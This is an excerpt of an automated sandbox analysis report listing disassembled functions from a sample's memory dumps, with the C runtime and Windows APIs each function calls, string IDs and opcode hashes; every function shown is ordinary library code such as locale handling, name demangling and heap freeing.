                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwind
                                          • String ID: csm$csm$csm
                                          • API String ID: 3456342781-393685449
                                          • Opcode ID: 2dae6837e03d70a89292e8ab678d2caf1799cb180c87e5166810368e8d9df4c1
                                          • Instruction ID: 5c771f516e1a0ae4efe1be2f91232ef84ad0bcedafe131f885a76e6523beda16
                                          • Opcode Fuzzy Hash: 2dae6837e03d70a89292e8ab678d2caf1799cb180c87e5166810368e8d9df4c1
                                          • Instruction Fuzzy Hash: 15B19D7180828AEFCF05DFA4CA809AEBBB5FF14314B11405AF9116B21DD7B1DA61CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D141AF0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D141B73
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D141BBF
                                          • __Getctype.LIBCPMT ref: 6D141BD8
                                          • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6D141BF4
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D141C89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                          • String ID: bad locale name
                                          • API String ID: 1840309910-1405518554
                                          • Opcode ID: 2c8098701389d90521ab2e26a6032e177fcf3ca417ac0a25e5bd4d890ca52202
                                          • Instruction ID: 078a1a2f9246eed5f1023864f26ba8c71a307ccdf691166b6bb513d04820b125
                                          • Opcode Fuzzy Hash: 2c8098701389d90521ab2e26a6032e177fcf3ca417ac0a25e5bd4d890ca52202
                                          • Instruction Fuzzy Hash: 4B51A1B1D042889BEB10CFE4DD44B9EBBB8AF24304F148169DD18A7348E7B5E555CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D16DD55 Relevance: 10.7, APIs: 7, Instructions: 151COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D16DDE3
                                          • DName::operator+.LIBCMT ref: 6D16DE36
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                            • Part of subcall function 6D16C97B: DName::operator+.LIBCMT ref: 6D16C99C
                                          • DName::operator+.LIBCMT ref: 6D16DE27
                                          • DName::operator+.LIBCMT ref: 6D16DE87
                                          • DName::operator+.LIBCMT ref: 6D16DE94
                                          • DName::operator+.LIBCMT ref: 6D16DEDB
                                          • DName::operator+.LIBCMT ref: 6D16DEE8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$shared_ptr
                                          • String ID:
                                          • API String ID: 1037112749-0
                                          • Opcode ID: acbdac36c1897775da30ca836d6b072611b089ef2132d4213fc92773da090fc6
                                          • Instruction ID: eeb69d58ca684a50c911ee763a2399089719f92c4ab1579f681ad2a2e8208cae
                                          • Opcode Fuzzy Hash: acbdac36c1897775da30ca836d6b072611b089ef2132d4213fc92773da090fc6
                                          • Instruction Fuzzy Hash: 8551A1B1904299AFDF05DBA4C851EEEBFB9AF58304F11405AF601A7188EBB49654CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D164DD0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 131COMMON
                                          Download Yara Rule
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6D164E0A
                                          • GetLastError.KERNEL32(0000000A), ref: 6D164E35
                                          Strings
                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6D164E50
                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6D164F3B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: CounterErrorLastPerformanceQuery
                                          • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                          • API String ID: 1297246462-2136607233
                                          • Opcode ID: 0b110b55086e5aa65609a004af7ee21e520f3a052e555999ccf12ae86972dd17
                                          • Instruction ID: 63b59145d388f07f4f09bf71499084d0f6b77f799adb92a840aa34db4d427e2a
                                          • Opcode Fuzzy Hash: 0b110b55086e5aa65609a004af7ee21e520f3a052e555999ccf12ae86972dd17
                                          • Instruction Fuzzy Hash: B14191B1D08288EFCB00DFE4D944FAEB7B8FB09704F10415AE925E7685DBB8A518CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E3945DA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualQuery.KERNEL32(?,|+uy,0000001C,79752B7C,?,?,?), ref: 6E3944F6
                                          • __FindPESection.LIBCMT ref: 6E394533
                                          • _ValidateScopeTableHandlers.LIBCMT ref: 6E394553
                                          • __FindPESection.LIBCMT ref: 6E39456D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                          • String ID: d.9n$|+uy
                                          • API String ID: 1876002356-1583235331
                                          • Opcode ID: e9e0e8129cd6660817b902a88b18f81df5f0c83517424cf9b0b277ef1c00be24
                                          • Instruction ID: 937e395703abf84facd926f128aa6a7690e3d0df9383046485bc7b3445b72100
                                          • Opcode Fuzzy Hash: e9e0e8129cd6660817b902a88b18f81df5f0c83517424cf9b0b277ef1c00be24
                                          • Instruction Fuzzy Hash: E131AFB5A002169FEF14CEEDA9807AD77F9EB09314F150564E924E7241F731EC46DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6E397280 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 99COMMON
                                          Download Yara Rule
                                          APIs
                                          • __TypeMatch.VCRUNTIME140(19930520,?,00000000), ref: 6E39732F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E390000, based on PE: true
                                          • Associated: 00000003.00000002.4090095751.000000006E390000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090184684.000000006E3A1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000003.00000002.4090211589.000000006E3A2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6e390000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: MatchType
                                          • String ID: MOC$RCC$csm$csm
                                          • API String ID: 3879256720-1441736206
                                          • Opcode ID: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                          • Instruction ID: d4a359c97abfbea607fbf0ed0c1b1bad34f859abf6ab7b4c62fb0515497bed20
                                          • Opcode Fuzzy Hash: 575861497c6171d50b7fb55445dbb98d76bfa401fdd57ca0dfbdc6efc15d476b
                                          • Instruction Fuzzy Hash: 0D318835810706DFEB748EA4C48079AB3B8EF40305F45096EDC91576D1E372EAA5EAE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17F103 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: api-ms-$ext-ms-
                                          • API String ID: 0-537541572
                                          • Opcode ID: 7d90a4b663c0d790ecc91aa3babcb84085f2c2825ad845b541a1592e8dcc04c5
                                          • Instruction ID: 92c28359aad97aecf2549cf14249b25591e626ec2ca80289e77ebe8dfc791e4d
                                          • Opcode Fuzzy Hash: 7d90a4b663c0d790ecc91aa3babcb84085f2c2825ad845b541a1592e8dcc04c5
                                          • Instruction Fuzzy Hash: 0221B7B2A45225BBDB328A24DD84B2B3778AF577B1F110111E975AB2A8D7F0D901C6E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D185C46 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D185992: _free.LIBCMT ref: 6D1859B7
                                          • _free.LIBCMT ref: 6D185C94
                                            • Part of subcall function 6D17ACB9: HeapFree.KERNEL32(00000000,00000000,?,6D1799DC), ref: 6D17ACCF
                                            • Part of subcall function 6D17ACB9: GetLastError.KERNEL32(?,?,6D1799DC), ref: 6D17ACE1
                                          • _free.LIBCMT ref: 6D185C9F
                                          • _free.LIBCMT ref: 6D185CAA
                                          • _free.LIBCMT ref: 6D185CFE
                                          • _free.LIBCMT ref: 6D185D09
                                          • _free.LIBCMT ref: 6D185D14
                                          • _free.LIBCMT ref: 6D185D1F
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                          • Instruction ID: 98d7233a01d41ac53a94abf632a9ed741fd3942db30502110dbf09bb57a4d2b6
                                          • Opcode Fuzzy Hash: eb39591fd0f0be1efd17b95bc03b99b1438c6507ce2fa1df8b035add4231ff87
                                          • Instruction Fuzzy Hash: AE115C31949B04BAEE30EBB0CC06FDBB7BC9F00714F418814B79F66066DBA6A5055A90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D17D1EA Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D17D232
                                          • __fassign.LIBCMT ref: 6D17D417
                                          • __fassign.LIBCMT ref: 6D17D434
                                          • WriteFile.KERNEL32(?,6D1739A1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D17D47C
                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D17D4BC
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D17D564
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                          • String ID:
                                          • API String ID: 1735259414-0
                                          • Opcode ID: 08812ded7feae78fd883004daf477369c8279007f5b5ed84fadf85bbb845552d
                                          • Instruction ID: c4a9161b91da53ba53913e8c3eaad5ed42ac54977c8ab612d9bb30a0679cfb1b
                                          • Opcode Fuzzy Hash: 08812ded7feae78fd883004daf477369c8279007f5b5ed84fadf85bbb845552d
                                          • Instruction Fuzzy Hash: 73C19DB1D0425DCFCF11CFA8C8809EDBBB5AF49314F28416AE865BB255D7B1A942CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D167142 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D16718B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1671F6
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D167213
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D167252
                                          • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1672B1
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,6D1A055F,00000000,?,bad locale name), ref: 6D1672D4
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiStringWide
                                          • String ID:
                                          • API String ID: 2829165498-0
                                          • Opcode ID: 1da7ed38020e41def381325449513158cfb93cfd9b682dd8f812c7284be2ad48
                                          • Instruction ID: dccde82bf12c7e632b90a02047e2b96555ea2f10fd85dd0be5b9dd889dad6655
                                          • Opcode Fuzzy Hash: 1da7ed38020e41def381325449513158cfb93cfd9b682dd8f812c7284be2ad48
                                          • Instruction Fuzzy Hash: EF51A1B2910296AFEF118FA4CC44FAB3BB9EB55750F11851AF924D6558D7B4C820CB70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1484F0 Relevance: 9.1, APIs: 6, Instructions: 135COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148537
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148559
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148579
                                          • std::_Facet_Register.LIBCPMT ref: 6D1485E8
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148604
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6D14864B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                          • String ID:
                                          • API String ID: 2081738530-0
                                          • Opcode ID: d36b53e4b7559f14a6909c417e30793221d0833b8083a96dff9645df957c54f4
                                          • Instruction ID: 3c17902f2bb4be5cdefd495ae6eed1ea33aa57192260005fd01353b13c44ed50
                                          • Opcode Fuzzy Hash: d36b53e4b7559f14a6909c417e30793221d0833b8083a96dff9645df957c54f4
                                          • Instruction Fuzzy Hash: 0341BE71E042588FCF01CFA8D584BAEBBB4FF09724F15819AD906AB345D7B4A944CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1724DA Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • DName::operator+.LIBCMT ref: 6D17251E
                                          • DName::operator+.LIBCMT ref: 6D17252A
                                            • Part of subcall function 6D16CA50: shared_ptr.LIBCMT ref: 6D16CA6C
                                          • DName::operator+=.LIBCMT ref: 6D1725E8
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D170E1D
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D1710E7
                                            • Part of subcall function 6D16C97B: DName::operator+.LIBCMT ref: 6D16C99C
                                          • DName::operator+.LIBCMT ref: 6D1725A5
                                            • Part of subcall function 6D16CAA8: DName::operator=.LIBVCRUNTIME ref: 6D16CAC9
                                          • DName::DName.LIBVCRUNTIME ref: 6D17260C
                                          • DName::operator+.LIBCMT ref: 6D172618
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                          • String ID:
                                          • API String ID: 2795783184-0
                                          • Opcode ID: 6046cef6a55be3a6053b7c5769e45c79e9be5df2eb8e6a36931100fb4cbfa49d
                                          • Instruction ID: 5cf1b39e48348a6bd3d52f6645e852b52a6891ef70e330950bdd3d7d72184c72
                                          • Opcode Fuzzy Hash: 6046cef6a55be3a6053b7c5769e45c79e9be5df2eb8e6a36931100fb4cbfa49d
                                          • Instruction Fuzzy Hash: EF41DBB0A042859FDF21DF68C850BED7FF5EB0A308F414459E196E7258D7F45981C760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D1486E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                          Download Yara Rule
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148716
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6D148739
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D148759
                                          • std::_Facet_Register.LIBCPMT ref: 6D1487CB
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6D1487E3
                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6D148806
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
                                          • Associated: 00000003.00000002.4089735216.000000006D140000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089846975.000000006D1AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089930774.000000006D1C7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089961146.000000006D1C8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1C9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4089992246.000000006D1CB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                          • Associated: 00000003.00000002.4090063248.000000006D1CC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_6d140000_FilePost?a.jbxd
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                          • String ID:
                                          • API String ID: 2081738530-0
                                          • Opcode ID: f3053600e3635283420d6fd93d6909913751346f5e0cf57c47ec99c4c847d0f3
                                          • Instruction ID: 657a7142e8085972882ccac2e56e5a002013ce51e09ca2f3e8b7b1374ecb3a70
                                          • Opcode Fuzzy Hash: f3053600e3635283420d6fd93d6909913751346f5e0cf57c47ec99c4c847d0f3
                                          • Instruction Fuzzy Hash: 3D41CEB1D0425ACFCF01CF94D990BAEBBB4FB05725F15825AD905A7344E7B4A940CBE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 6D171170 Relevance: 9.1, APIs: 6, Instructions: 94COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 6D17262E: Replicator::operator[].LIBCMT ref: 6D17266B
                                          • DName::operator=.LIBVCRUNTIME ref: 6D17121A
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D170E1D
                                            • Part of subcall function 6D170DB2: DName::operator+.LIBCMT ref: 6D1710E7
                                          • DName::operator+.LIBCMT ref: 6D1711D4
                                          • DName::operator+.LIBCMT ref: 6D1711E0
                                          • DName::DName.LIBVCRUNTIME ref: 6D171232
                                          • DName::operator+.LIBCMT ref: 6D171241
                                          • DName::operator+.LIBCMT ref: 6D17124D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.4089780985.000000006D141000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6D140000, based on PE: true
